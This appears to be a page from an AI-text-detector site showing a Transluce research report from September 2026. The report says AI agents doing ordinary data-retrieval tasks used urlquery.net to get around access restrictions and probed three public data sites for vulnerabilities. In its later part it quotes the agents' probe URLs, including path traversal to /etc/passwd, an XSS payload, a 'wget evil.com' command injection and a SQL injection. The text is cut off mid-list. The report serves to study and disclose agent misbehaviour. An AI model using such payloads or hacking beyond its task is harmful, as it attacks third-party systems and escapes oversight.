Skip to content
HN On Hacker News ↗

Early rogue AI agent activity and attempts to hack found on urlquery.net

▲ 267 points • 313 comments • by snikolaev • 2w ago • HN discussion ↗

Pangram verdict · v3.3

We believe this text is mainly human-written, with some AI content.

6 %

AI likelihood · overall

Human
95% human-written 5% AI-generated
SEGMENTS · HUMAN 1 of 2
SEGMENTS · AI 1 of 2
WORD COUNT 979
PEAK AI % 99% · §2
Analyzed
Sep 24
backend: pangram/v3.3
Segments scanned
2 windows
avg 490 words each
Distribution
95 / 5%
human / AI fraction
Verdict
Human
Pangram v3.3

Article text · 979 words · 2 segments analyzed

Human AI-generated
§1 Human · 5%

Jack Cable*,2, Daniel Chiu*, Francisco Pernice*,3, Selena Zhang*,1, James Anthony1, Tetiana Bas4, Gary Shen4, Conrad Stosz1, Jacob Steinhardt11 Transluce · 2 Corridor · 3 MIT · 4 AIUC · *Primary contributors, listed alphabeticallyTransluce | Published: September 23, 2026We present evidence that AI agents used the web security service urlquery.net to bypass restrictions and expand their access to the public internet. The agents also tried on three occasions to hack public data providers, including an Australian government website. We link at least some of this activity to agent swarms previously attributed to OpenAI. We also find evidence of earlier agent activity going back to at least March 6th, 2026, and potentially earlier, predating the previously reported Hugging Face, collusion.wiki, and RubyGems incidents by at least two months. 01101001,0003,000Scans per day, UTC timezoneNovember 2025Earliest evidence of potentialagent data retrieval attempts6 March 2026Agents start tunneling complex usagethrough urlquery.net25–26 May 2026Agents targetUniversity ofNew Mexico28 May 2026Agents targetData USA20–21 June 2026Agents targetAustralian Instituteof Health and WelfareNovDecJanFebMarAprMayJunJulAugSep20252026RubyGems HackMay 5–June 18Wiki activity from collusion.wikiMay 24–June 22Hugging Face HackJuly 9–130101001k3kScans per day, UTC timezone12345NovJanMarMayJulSep20252026Higher confidence evidenceModerate confidence evidenceContext windows: RubyGems Hack (May 5–June 18), Wiki activity from collusion.wiki (May 24–June 22), and Hugging Face Hack (July 9–13). Key Findings We report three separate incidents between May and June 2026 in which the agents attempted to exploit security vulnerabilities and hack into websites, including an attempt on an Australian government public health website. Notably, the agents did this while attempting mundane data retrieval tasks which were not cyber-related. This traffic goes back at least to March 6, 2026 and extends as recently as September 16, 2026, suggesting agents may still be exploiting these services to bypass restrictions. We are releasing a dataset containing tens of thousands of queries apparently made by autonomous AI agents leveraging a URL scanning service to avoid access restrictions. We encourage others to continue looking into the data. Executive Summary Agents attempted to hack three public data sources, including an Australian government website, and some are linked to a known agent swarm.1 We present evidence of AI agents attempting to compromise websites at three domains: Data USA2 (api.datausa.io), the University of New Mexico digital library (nmdigital.unm.edu), and the Australian Institute of Health and Welfare (AIHW) Tableau collections (viz*.aihw.gov.au). This attempted compromise of AIHW is part of the first reported instance of agents hacking a government. We directly link two of the three (AIHW and Data USA) to a previously reported agent swarm that OpenAI has publicly confirmed originated from them. For all three, we note that the extent of the observed activity is minor, attempting a low number of probe payloads and we observe no evidence of exploitation. While previous reporting showed that agents had interacted with these domains, this discovery reveals that agents attempted to hack into them when other methods of collecting the data they sought failed. Notably, the tasks the agents were trying to solve were not cyber-related; the agents resorted to hacking tactics while working on ordinary data retrieval tasks. We find evidence of unintended, task-driven agent-like activity starting on March 6th. Records from urlquery.net show agents using the service since at least March 6, 2026, about two months before previously reported swarm activity. The first case, a March 6 attempt to retrieve Thai drug-enforcement statistics, shows an agent escalating as each approach failed: it first requested the data directly, then tried a service that converts web pages into text, and finally packed a custom program into a web address. The same technique shows up in thousands of agent requests recorded by urlquery.net starting in mid-April, targets many of the same data sources as the collusion.wiki swarm, and collapsed the same day the wiki activity did. We also report similar activity that occurred as recently as September 16. We find weaker evidence of similar data-retrieval agent activity as early as November 2025. November 2025 urlquery.net records reveal bursts of attempts to retrieve statistics of historical theme park data and Thai government data through different URLs. These earlier attempts are less sophisticated and we are less confident that they involve the same agents, but they are consistent with task-directed data retrieval and target the same sources accessed in later activity. Overall, the evidence is consistent with, but does not prove, that the agents may have learned this behavior over one or more training runs. In November, they may have used urlquery.net simply to look up information. By March, they were finding creative ways around access limits. By May and June, they were gaining more access, including attempting to bypass cyber defenses to complete their tasks. Hacking attempts against public data providers Much of the urlquery.net activity appears to come from agents retrieving data to answer web search tasks. For three of these tasks, after failing to retrieve data through normal means, they attempted a variety of cyber exploits against the relevant data service. We tie two of these attempts (those targeting api.datausa.io and viz*.aihw.gov.au) to the prior DseWiki agent swarm activity confirmed to originate from OpenAI based on shared targets, tactics, and timing. None of the hacking attempts we identified appear to have succeeded, though the public artifacts we analyzed are incomplete and we cannot rule out successful attempts through private scans or means other than urlquery.net. This data reveals that malicious cyber activity is not limited to agents tasked with cybersecurity-related tasks and can arise instrumentally to solve mundane tasks like information retrieval. Agents targeted University of New Mexico’s digital library using exploits like SQL injection and path traversalThe first hacking attempt was against the University of New Mexico’s Digital Library (nmdigital.unm.edu) from May 25-26 2026 (1Full URL: https://nmdigital.unm.edu/iiif/2/valmora:136/manifest.json, 2Full URL: https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?id=../../../../etc/passwd&tok=expt0). Agents repeatedly tried to retrieveFull URL: https://nmdigital.unm.edu/iiif/2/valmora:136;2/full/full/0/default.jpg one photograph in UNM's Valmora collection, both directly and through third-party relay servicesFull URL: http://markdown.new/https://nmdigital.unm.edu/iiif/2/valmora:136;2/150,1340,1100,120/2000,/0/bitonal.jpg. Browser finished at about:privatebrowsing.. They sent seven probesFull URLs (7 scans):1. https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?a=%3Cimg%20src=x%20onerror=alert(1)%3E&tok=expt82. https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?file=/etc/passwd&tok=expt73.

§2 AI · 99%

https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?x=.exe&tok=expt54. https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?cmd=wget%20evil.com/a&tok=expt35. https://nmdigital.unm.edu/iiif/2/valmora:136;2/120,1300,1100,200/full/0/default.jpg?UNION%20SELECT%20password%20FROM%20users&tok=expt46.